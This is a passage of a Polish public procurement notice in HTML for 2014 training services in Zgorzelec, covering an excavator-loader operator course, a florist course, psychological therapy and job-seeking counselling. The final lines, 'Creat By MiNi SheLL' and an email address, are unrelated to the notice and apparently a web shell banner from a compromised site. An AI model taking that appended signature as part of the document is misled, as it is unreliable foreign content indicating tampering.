Zajęcia szkoleniowe powinny być planowane 5 razy w tygodniu od poniedziałku do piątku, a za zgodą osób skierowanych na szkolenie, także w dni ustawowo wolne od pracy tj. soboty, niedziele. Zaleca się, by wymiar dzienny każdego ze szkoleń wynosił max. 6 godzin lekcyjnych. Program kursu powinien być zgodny z Rozporządzeniem Ministra Gospodarki z dnia 20.09.2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz.U. Nr 118, poz.1263) oraz zatwierdzony przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie. Przy realizacji kursu należy dodatkowo: zapewnić badanie lekarskie stwierdzające brak przeciwwskazań do pracy jako operator koparko-ładowarki oraz jednorazowo opłacić egzamin państwowy (teoretyczny i praktyczny). Realizacja części IV zamówienia obejmuje przeprowadzenie kursu, najem lokalu na terenie miasta Zgorzelec lub gminy wiejskiej Zgorzelec, w którym będą odbywać  się zajęcia teoretyczne i praktyczne oraz ewentualny transport uczestników ze Zgorzelca do miejsca odbywania szkolenia i z powrotem na terenie gminy wiejskiej Zgorzelec, ubezpieczenie uczestników NNW, zapewnienie uczestnikom niezbędnych narzędzi, materiałów szkoleniowych i artykułów w ilościach niezbędnych do nabycia przez uczestników kursu praktycznych umiejętności z zakresu tematyki ujętej w programie kursu, zapewnienie na każde spotkanie poczęstunku (np. bułki słodkie lub suche ciasteczka; napoje zimne: woda mineralna; napoje ciepłe: kawa, herbata; cukier; kubki; talerzyki i łyżeczki jednorazowe) do lokalu, w którym będą odbywać się zajęcia teoretyczne. Podczas ćwiczeń praktycznych wszystkie osoby biorące udział w kursie powinny mieć zapewnione środki ochrony indywidualnej oraz przestrzeganie zasad BHP. 
Program szkolenia powinien odpowiadać wymogom określonym w § 5 Rozporządzenia Ministra Edukacji i Nauki z dnia 03.02.2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31, poz.216). Kurs powinien zakończyć się egzaminem państwowym stwierdzającym stopień opanowania wiedzy i umiejętności z zakresu teoretycznego i praktycznego przygotowania uczestników do samodzielnej obsługi koparko-ładowarki, a po egzaminie wydaniem świadectwa potwierdzającego pozytywny wynik sprawdzianu na uprawnienia operatora koparko-ładowarki oraz książek operatora maszyn roboczych - wydaniem zaświadczenia zgodnie z Rozporządzeniem MEN z dnia 11.05.2012 r. w sprawie kształcenia ustawicznego (Dz. U. z 2012 r., poz.186).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Szkolenie bukieciarz-florysta z artystycznym pakowaniem prezentów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie bukieciarz-florysta z artystycznym pakowaniem prezentów (zajęcia teoretyczne i praktyczne). Ilość osób - 2. Kurs powinien trwać:
- szkolenie teoretyczne w wymiarze 50 h lekcyjnych (1 godzina lekcyjna = 45 minut zegarowych na grupę). 
- szkolenie praktyczne w wymiarze 70 h zegarowych na uczestnika szkolenia. Program szkolenia powinien uwzględniać m. in. następujące zagadnienia: anatomia i fizjologia roślin, asortyment roślin ozdobnych, sposoby utrwalania materiału roślinnego, główne aspekty uprawy roślin ozdobnych, narzędzia i środki techniczne, artykuły dekoracyjne, style w kompozycji, ekonomika handlu, podstawowe zasady wykonywania kompozycji, wiązanki i dekoracje okolicznościowe, kompozycje w naczyniach, florystyka ślubna i żałobna, kompozycje z roślin suchych, sztucznych i preparowanych, techniki pakowania prezentów. Zajęcia teoretyczne w formie wykładów i pogadanek. Zajęcia praktyczne to praca z wykorzystaniem nożyczek, sekatorów, naczyń szklanych i wazonów, kwiatów ciętych i sztucznych oraz wstążek i innych dekoracji.  
Zajęcia szkoleniowe powinny być planowane 5 razy w tygodniu od poniedziałku do piątku, a za zgodą osób skierowanych na szkolenie, także w dni ustawowo wolne od pracy tj. soboty, niedziele.Zaleca się, by wymiar dzienny każdego ze szkoleń wynosił max. 6 godzin lekcyjnych.
Realizacja części V zamówienia obejmuje przeprowadzenie szkolenia, najem lokalu na terenie miasta Zgorzelec lub gminy wiejskiej Zgorzelec, w którym będą odbywać  się zajęcia teoretyczne i praktyczne oraz ewentualny transport uczestników szkolenia ze Zgorzelca do miejsca odbywania szkolenia i z powrotem na terenie gminy wiejskiej Zgorzelec, ubezpieczenie uczestników NNW, zapewnienie uczestnikom niezbędnych narzędzi, materiałów szkoleniowych i artykułów w ilościach niezbędnych do nabycia przez uczestników szkolenia praktycznych umiejętności z zakresu tematyki ujętej w programie szkolenia, zapewnienie na każde spotkanie poczęstunku (np. bułki słodkie lub suche ciasteczka; napoje zimne: woda mineralna; napoje ciepłe: kawa, herbata; cukier; kubki; talerzyki i łyżeczki jednorazowe) do lokalu, w którym będą odbywać się zajęcia teoretyczne i praktyczne a także wszystkie niezbędne czynności związane z wykonaniem przedmiotu zamówienia.
Każdy z uczestników kursu otrzyma zaświadczenie o ukończeniu kursu zgodnie ze wzorem ustalonym przez Ministra Edukacji Narodowej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Terapia psychologiczna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Terapia  psychologiczna (zajęcia teoretyczne i praktyczne). Ilość osób - 27.
Wymiar 20 h lekcyjnych. Zamawiający zaleca, aby zakres tematyczny oraz program zajęć dot. teorii psychologii obejmował zajęcia w zakresie pozyskiwania umiejętności np. poznania siebie w kontakcie z innymi ludźmi, zdobywania wiedzy o sobie oraz swoim funkcjonowaniu w relacjach interpersonalnych, uzyskania od innych osób szczerej i pełnej informacji jak jesteśmy przez innych widziani i jakie wywołujemy 
w nich reakcje. Zaleca się, by wymiar dzienny każdego ze szkoleń wynosił max. 6 godzin lekcyjnych. Zakres tematyczny warsztatów m.in.:asertywność w relacjach interpersonalnych (reagowanie na krytykę i zastrzeżenia, umiejętność odmawiania, wydawania poleceń, stawianie granic i egzekwowanie wymagań, umiejętność wyrażania opinii, kształtowanie poczucia własnej wartości i wzmocnienie samooceny), - umiejętność radzenia sobie ze stresem i przezwyciężanie problemów życiowych, konstruktywność działań w sytuacjach trudnych.
Realizacja części VI zamówienia obejmuje przeprowadzenie warsztatów,              najem lokalu na terenie miasta Zgorzelec lub gminy wiejskiej Zgorzelec, w którym                     będą odbywać  się zajęcia oraz ewentualny transport uczestników ze Zgorzelca do miejsca odbywania szkolenia i z powrotem na terenie gminy wiejskiej Zgorzelec, ubezpieczenie uczestników NNW, zapewnienie niezbędnych narzędzi, materiałów szkoleniowych i artykułów w ilościach niezbędnych do nabycia przez uczestników  praktycznych umiejętności z zakresu tematyki ujętej w programie warsztatów, zapewnienie na każde spotkanie poczęstunku (np. bułki słodkie lub suche ciasteczka; napoje zimne: woda mineralna; napoje ciepłe: kawa, herbata; cukier; kubki; talerzyki i łyżeczki jednorazowe) do lokalu, w którym będą odbywać się zajęcia, a także wszystkie niezbędne czynności związane z wykonaniem przedmiotu zamówienia. Każdy z uczestników otrzyma certyfikat poświadczający uczestnictwo w warsztatach.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.12.70-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Poradnictwo indywidualne i grupowe w zakresie kompetencji życiowych i umiejętności społeczno-zawodowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia poradnictwa indywidualnego i grupowego w zakresie podniesienia kompetencji życiowych i umiejętności społeczno-zawodowych                              (zajęcia teoretyczne  i praktyczne). Ilość osób - 27.
Wymiar 20 godzin lekcyjnych grupowo + 162 godzin lekcyjnych przeznaczonych na indywidualne konsultacje z psychologiem po 6 godzin na osobę = razem 182 godziny lekcyjne. Zaleca się, by wymiar dzienny każdego ze szkoleń wynosił max. 6 godzin lekcyjnych. Zakres tematyczny warsztatów między innymi: - techniki i metody aktywnego poszukiwania pracy, plan działania jako ważny element poszukiwania pracy, analiza dotychczasowych niepowodzeń w poszukiwaniu pracy, przygotowanie do rozmowy z pracodawcą, - wzmocnienie własnego optymizmu i
wprowadzenie satysfakcjonujących zmian osobistych, - kreowanie własnego wizerunku (elementy wizerunku wpływające na sukces, psychologia koloru, dobór stroju do typu sylwetki, światło i kolor), poradnictwo w połączeniu z autoprezentacją, komunikacją werbalną i niewerbalną, wystąpieniami publicznymi i savoir-vivrem.
Realizacja części VII zamówienia obejmuje przeprowadzenie warsztatów,              najem lokalu na terenie miasta Zgorzelec lub gminy wiejskiej Zgorzelec, w którym                     będą odbywać  się zajęcia oraz ewentualny transport uczestników ze Zgorzelca do miejsca odbywania szkolenia i z powrotem na terenie gminy wiejskiej Zgorzelec, ubezpieczenie uczestników NNW, zapewnienie niezbędnych narzędzi, materiałów szkoleniowych i artykułów w ilościach niezbędnych do nabycia przez uczestników  praktycznych umiejętności z zakresu tematyki ujętej w programie warsztatów, zapewnienie na każde spotkanie poczęstunku (np. bułki słodkie lub suche ciasteczka; napoje zimne: woda mineralna; napoje ciepłe: kawa, herbata; cukier; kubki; talerzyki i łyżeczki jednorazowe) do lokalu, w którym będą odbywać się zajęcia, a także wszystkie niezbędne czynności związane z wykonaniem przedmiotu zamówienia. Każdy z uczestników otrzyma certyfikat poświadczający uczestnictwo w warsztatach.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com